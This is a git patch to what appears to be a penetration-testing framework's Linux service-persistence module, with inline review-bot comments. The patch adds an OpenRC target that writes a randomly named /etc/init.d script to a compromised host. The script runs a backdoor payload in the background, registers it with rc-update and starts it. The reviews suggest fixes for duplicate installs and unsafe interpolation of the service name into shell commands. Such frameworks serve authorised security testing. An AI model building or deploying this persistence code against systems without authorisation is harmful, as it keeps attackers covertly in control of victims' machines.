From 811678a793d9896d8e67af8c8eaed9e5d3b7458d Mon Sep 17 00:00:00 2001
From: jvoisin
Date: Thu, 19 Sep 2024 22:26:43 +0200
Subject: [PATCH] Add openrc to exploits/linux/local/service_persistence.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
---
 .../linux/local/service_persistence.rb | 46 +++++++++++++++++++
 1 file changed, 46 insertions(+)
diff --git a/modules/exploits/linux/local/service_persistence.rb b/modules/exploits/linux/local/service_persistence.rb
index 685d190dbf62..47efe825d723 100644
--- a/modules/exploits/linux/local/service_persistence.rb
+++ b/modules/exploits/linux/local/service_persistence.rb
@@ -59,6 +59,11 @@ def initialize(info = {})
 'BACKDOOR_PATH' => '/usr/local/bin'
 }
 ],
+ ['openrc', 'DefaultOptions' =>
+ {
+ 'BACKDOOR_PATH' => '/usr/local/bin'
+ }
+ ],
 ['systemd', 'DefaultOptions' =>
 {
 'BACKDOOR_PATH' => '/usr/local/bin'
@@ -118,6 +123,8 @@ def exploit
 system_v(path, file, target.opts[:runlevel], service_system_exists?('update-rc.d'))
 when 'Upstart'
 upstart(path, file, target.opts[:runlevel])
+ when 'openrc'
+ openrc(path, file)
 when 'systemd'
 systemd(path, file)
 when 'systemd user'
@@ -131,6 +138,10 @@ def exploit
 print_status('Utilizing Upstart')
 upstart(path, file, '2345')
 end
+ if service_system_exists?('openrc')
+ print_status('Utilizing openrc')
+ openrc(path, file)
+ end
 has_updatercd = service_system_exists?('update-rc.d')
 if has_updatercd || service_system_exists?('chkconfig') # centos 5
 print_status('Utilizing System_V')
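Review bot: In the automatic branch (the `@@ -131,6 +138,10 @@` hunk) the new `if service_system_exists?('openrc')` block is another independent `if` next to the Upstart and System V checks, so on a host where more than one probe succeeds the module writes and starts a service file for each. That leaves more on the target than one run should and more to remove afterwards. If only one init system is meant to be used per run, chain the probes (`elsif service_system_exists?('openrc')`) or return after the first install that succeeds. The rest of `exploit` lies outside the hunk, so confirm how the later branches are structured before changing the flow.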
@@ -397,4 +408,39 @@ def system_v(backdoor_path, backdoor_file, runlevel, has_updatercd)
 cmd_exec("/etc/init.d/#{service_filename} start")
 end
 end
+
+ def openrc(backdoor_path, backdoor_file)
+ # https://wiki.alpinelinux.org/wiki/Writing_Init_Scripts
+ # https://wiki.alpinelinux.org/wiki/OpenRC
+ # https://github.com/OpenRC/openrc/blob/master/service-script-guide.md
+ script = %{#!/sbin/openrc-run
+name=#{backdoor_file}
+command=/bin/sh
+command_args="#{backdoor_path}/#{backdoor_file}"
+pidfile="/run/${RC_SVCNAME}.pid"
+command_background="yes"
+}
+
+ service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
+ service_name = "/etc/init.d/#{service_filename}"
+ vprint_status("Writing service: #{service_name}")
+ begin
+ upload_and_chmodx(service_name, script)
+ rescue Rex::Post::Meterpreter::RequestError
+ print_error("Writing '#{service_name}' to the target and or changing the file permissions failed, ensure that directory exists?")
+ end
+
+ if !file_exist?(service_name)
+ print_error('File not written, check permissions.')
+ return
+ end
+
+ if datastore['EnableService']
+ vprint_status('Enabling service')
+ cmd_exec("rc-update add '#{service_filename}'")
+ end
+
+ vprint_status('Starting service')
+ cmd_exec("'/etc/init.d/#{service_filename}' start")
+ end
 end
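Review bot: `service_filename` is taken unchecked from `datastore['SERVICE']` and interpolated into `/etc/init.d/#{service_filename}` and into two single-quoted `cmd_exec` strings, so a value containing a quote, a space or a `/` breaks the quoting or moves the write outside `/etc/init.d`. Validate it once after the assignment, for example `fail_with(Failure::BadConfig, 'SERVICE must match [A-Za-z0-9_.-]+') unless service_filename.match?(/\A[A-Za-z0-9_.-]+\z/)`; the assignment itself reads better as `datastore['SERVICE'] || Rex::Text.rand_text_alpha(7)`. The same concern applies to `backdoor_path` and `backdoor_file` inside the double-quoted `command_args` line of the generated script. The method also has no comment saying what it leaves on the host: a short header stating that it writes `/etc/init.d/<service>` and, when `EnableService` is set, registers it with `rc-update add` would tell the operator what has to be removed after the engagement.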